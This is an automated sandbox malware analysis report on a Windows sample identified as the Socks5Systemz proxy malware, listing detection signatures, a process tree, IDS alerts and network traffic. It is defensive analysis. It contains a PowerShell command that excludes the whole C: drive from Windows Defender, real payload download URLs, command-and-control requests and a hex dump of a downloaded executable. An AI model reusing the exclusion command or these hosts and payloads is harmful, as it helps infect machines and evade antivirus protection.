Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
12321321.exe

Overview

General Information

Sample name:12321321.exe
Analysis ID:1631991
MD5:ce869420036665a228c86599361f0423
SHA1:8732dfe486f5a7daa4aedda48a3eb134bc2f35c0
SHA256:eb04f77eb4f92dd2b46d04408166a32505e5016435ccd84476f20eeba542dafd
Tags:exeuser-aachum
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Socks5Systemz
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to infect the boot sector
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has a writeable .text section
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

  • System is w10x64
  • 12321321.exe (PID: 8536 cmdline: "C:\Users\user\Desktop\12321321.exe" MD5: CE869420036665A228C86599361F0423)
    • c9f74e53-58d1-13d2-8abb-0195719b8be2.exe (PID: 8632 cmdline: "C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe" MD5: A875EFEC27F37FB4E42141BBA8771C65)
      • vbc.exe (PID: 8664 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe MD5: A526DE1F9DE51E1ACBC6B8A492673174)
        • powershell.exe (PID: 8684 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8884 cmdline: powershell Remove-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 9072 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • 1609a74d-2a2b-4f95-9570-07a864ac654e.exe (PID: 9004 cmdline: "C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exe" MD5: E4265C65F6F798BDC3F1644CAAA09379)
      • 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp (PID: 9024 cmdline: "C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp" /SL5="$5029E,4337550,56832,C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exe" MD5: 01EB6207431C47E642C878967668AC73)
        • photorecoverylib.exe (PID: 9140 cmdline: "C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exe" -i MD5: 84FDC770D4A9ECD786E59A0C9F7F9C26)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2564405418.0000000002DC1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    0000000A.00000002.2564318893.0000000002D23000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: powershell.exe PID: 8684JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: powershell.exe PID: 8884JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Process Memory Space: photorecoverylib.exe PID: 9140JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentProcessId: 8664, ParentProcessName: vbc.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 8684, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentProcessId: 8664, ParentProcessName: vbc.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 8684, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentProcessId: 8664, ParentProcessName: vbc.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 8684, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T18:16:20.698838+010020287653Unknown Traffic192.168.2.54969791.240.118.49443TCP
            2025-03-07T18:17:26.185271+010020287653Unknown Traffic192.168.2.549728176.113.115.96443TCP
            2025-03-07T18:17:31.981418+010020287653Unknown Traffic192.168.2.549730176.113.115.96443TCP
            2025-03-07T18:17:35.139122+010020287653Unknown Traffic192.168.2.549731176.113.115.96443TCP
            2025-03-07T18:17:39.108026+010020287653Unknown Traffic192.168.2.549733176.113.115.96443TCP
            2025-03-07T18:17:42.701375+010020287653Unknown Traffic192.168.2.549734176.113.115.96443TCP
            2025-03-07T18:17:46.244407+010020287653Unknown Traffic192.168.2.549735176.113.115.96443TCP
            2025-03-07T18:17:49.606929+010020287653Unknown Traffic192.168.2.549736176.113.115.96443TCP
            2025-03-07T18:17:52.794279+010020287653Unknown Traffic192.168.2.549737176.113.115.96443TCP
            2025-03-07T18:17:55.794958+010020287653Unknown Traffic192.168.2.549738176.113.115.96443TCP
            2025-03-07T18:17:58.800078+010020287653Unknown Traffic192.168.2.549739176.113.115.96443TCP
            2025-03-07T18:18:01.825206+010020287653Unknown Traffic192.168.2.549740176.113.115.96443TCP
            2025-03-07T18:18:05.940852+010020287653Unknown Traffic192.168.2.549741176.113.115.96443TCP
            2025-03-07T18:18:09.102287+010020287653Unknown Traffic192.168.2.549742176.113.115.96443TCP
            2025-03-07T18:18:12.331619+010020287653Unknown Traffic192.168.2.549743176.113.115.96443TCP
            2025-03-07T18:18:15.527351+010020287653Unknown Traffic192.168.2.549744176.113.115.96443TCP
            2025-03-07T18:18:20.027655+010020287653Unknown Traffic192.168.2.549745176.113.115.96443TCP
            2025-03-07T18:18:23.052496+010020287653Unknown Traffic192.168.2.549746176.113.115.96443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T18:16:15.568672+010020225501A Network Trojan was detected192.168.2.549696104.168.28.1080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T18:17:27.113002+010028032742Potentially Bad Traffic192.168.2.549728176.113.115.96443TCP
            2025-03-07T18:17:32.769075+010028032742Potentially Bad Traffic192.168.2.549730176.113.115.96443TCP
            2025-03-07T18:17:35.963235+010028032742Potentially Bad Traffic192.168.2.549731176.113.115.96443TCP
            2025-03-07T18:17:39.918040+010028032742Potentially Bad Traffic192.168.2.549733176.113.115.96443TCP
            2025-03-07T18:17:43.589724+010028032742Potentially Bad Traffic192.168.2.549734176.113.115.96443TCP
            2025-03-07T18:17:47.201536+010028032742Potentially Bad Traffic192.168.2.549735176.113.115.96443TCP
            2025-03-07T18:17:50.410216+010028032742Potentially Bad Traffic192.168.2.549736176.113.115.96443TCP
            2025-03-07T18:17:53.619803+010028032742Potentially Bad Traffic192.168.2.549737176.113.115.96443TCP
            2025-03-07T18:17:56.541987+010028032742Potentially Bad Traffic192.168.2.549738176.113.115.96443TCP
            2025-03-07T18:17:59.571710+010028032742Potentially Bad Traffic192.168.2.549739176.113.115.96443TCP
            2025-03-07T18:18:02.613599+010028032742Potentially Bad Traffic192.168.2.549740176.113.115.96443TCP
            2025-03-07T18:18:06.783551+010028032742Potentially Bad Traffic192.168.2.549741176.113.115.96443TCP
            2025-03-07T18:18:09.949496+010028032742Potentially Bad Traffic192.168.2.549742176.113.115.96443TCP
            2025-03-07T18:18:13.297413+010028032742Potentially Bad Traffic192.168.2.549743176.113.115.96443TCP
            2025-03-07T18:18:17.270071+010028032742Potentially Bad Traffic192.168.2.549744176.113.115.96443TCP
            2025-03-07T18:18:20.812730+010028032742Potentially Bad Traffic192.168.2.549745176.113.115.96443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 12321321.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://91.240.118.49/forsale/silk.exe?Avira URL Cloud: Label: malware
            Source: https://91.240.118.49/forsale/silk.exeAvira URL Cloud: Label: malware
            Source: http://104.168.28.10/001.exeAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\001[1].exeAvira: detection malicious, Label: TR/Kryptik.zlcio
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeAvira: detection malicious, Label: TR/Kryptik.zlcio
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\001[1].exeReversingLabs: Detection: 72%
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeReversingLabs: Detection: 72%
            Source: C:\Users\user\AppData\Local\Temp\d.ghSlh.exe (copy)ReversingLabs: Detection: 72%
            Source: C:\Windows\Temp\Hmas5kDc_8664.sysReversingLabs: Detection: 54%
            Multi AV Scanner detection for submitted file
            Source: 12321321.exeReversingLabs: Detection: 76%
            Source: 12321321.exeVirustotal: Detection: 73%Perma Link
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0045D230 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,8_2_0045D230
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0045D2E4 ArcFourCrypt,8_2_0045D2E4
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0045D2FC ArcFourCrypt,8_2_0045D2FC
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_10001000 ISCryptGetVersion,8_2_10001000
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_10001130 ArcFourCrypt,8_2_10001130
            Source: vbc.exe, 00000002.00000002.1397936172.000000014007F000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_7b0db95d-4

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeUnpacked PE file: 10.2.photorecoverylib.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Photo Recovery Library_is1Jump to behavior
            Source: unknownHTTPS traffic detected: 91.240.118.49:443 -> 192.168.2.5:49697 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.5:49728 version: TLS 1.2
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00452AD4 FindFirstFileA,GetLastError,8_2_00452AD4
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00475798 FindFirstFileA,FindNextFileA,FindClose,8_2_00475798
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,8_2_0046417C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,8_2_004645F8
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose,8_2_00462BF0
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,8_2_00498FDC
            Source: C:\Users\user\Desktop\12321321.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]0_2_00425949
            Source: C:\Users\user\Desktop\12321321.exeCode function: 4x nop then mov qword ptr [rcx+08h], rdx0_2_00488D60
            Source: global trafficTCP traffic: 192.168.2.5:49729 -> 193.176.153.180:2024
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 07 Mar 2025 17:16:15 GMTContent-Type: application/octet-streamContent-Length: 3161088Last-Modified: Thu, 12 Dec 2024 15:33:20 GMTConnection: keep-aliveETag: "675b0240-303c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 c0 91 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 b4 2f 00 00 86 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 2f 00 8c 85 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 91 b3 2f 00 00 20 00 00 00 b4 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 8c 85 00 00 00 e0 2f 00 00 86 00 00 00 b6 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 10 48 00 00 20 46 00 00 09 00 00 00 3d 00 00 06 30 8e 00 00 61 45 2f 00 90 47 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 50 00 00 00 01 00 00 11 16 2b 40 7e 24 00 00 04 2b 3c 2b 41 06 2c 1a 7e 25 00 00 04 7e 01 00 00 04 20 a0 00 00 00 28 81 00 00 06 28 91 00 00 06 2a 7e 25 00 00 04 7e 01 00 00 04 20 bd 00 00 00 28 81 00 00 06 28 91 00 00 06 2a 0a 2b bd 28 8e 00 00 06 2b bd 0a 2b bc 1e 02 28 4f 00 00 0a 2a 62 d0 02 00 00 02 2b 03 2b 08 2a 28 2d 00 00 0a 2b f6 28 86 00 00 06 2b f1 00 00 00 13 30 04 00 c3 00 00 00 02 00 00 11 12 00 18 1f 14 16 38 9a 00 00 00 12 01 18 1f 13 16 38 99 00 00 00 12 02 18 1f 13 16 38 98 00 00 00 7e 26 00 00 04 06 07 28 94 00 00 06 2c 1b 7e 25 00 00 04 7e 02 00 00 04 20 df 00 00 00 28 81 00 00 06 28 91 00 00 06 2b 19 7e 25 00 00 04 7e 02 00 00 04 20 1c 01 00 00 28 81 00 00 06 28 91 00 00 06 7e 26 00 00 04 07 08 28 94 00 00 06 2c 1a 7e 25 00 00 04 7e 02 00 00 04 20 5d 01 00 00 28 81 00 00 06 28 91 00 00 06 2a 7e 25 00 00 04 7e 02 00 00 04 20 9a 01 00 00 28 81 00 00 06 28 91 00 00 06 2a 28 50 00 00 0a 38 5c ff ff ff 28 50 00 00 0a 38 5d ff ff ff 28 50
            Source: Joe Sandbox ViewIP Address: 176.113.115.96 176.113.115.96
            Source: Joe Sandbox ViewIP Address: 193.176.153.180 193.176.153.180
            Source: Joe Sandbox ViewIP Address: 104.168.28.10 104.168.28.10
            Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
            Source: Network trafficSuricata IDS: 2022550 - Severity 1 - ET MALWARE Possible Malicious Macro DL EXE Feb 2016 : 192.168.2.5:49696 -> 104.168.28.10:80
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49697 -> 91.240.118.49:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49738 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49733 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49739 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49741 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49743 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49742 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49731 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49744 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49734 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49730 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49735 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49746 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49728 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49736 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49737 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49740 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49745 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49730 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49728 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49733 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49731 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49739 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49741 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49736 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49735 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49743 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49744 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49740 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49734 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49745 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49737 -> 176.113.115.96:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49742 -> 176.113.115.96:443
            Source: global trafficHTTP traffic detected: GET /forsale/silk.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.240.118.49Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5cd212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d4348dd7d493554dc9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
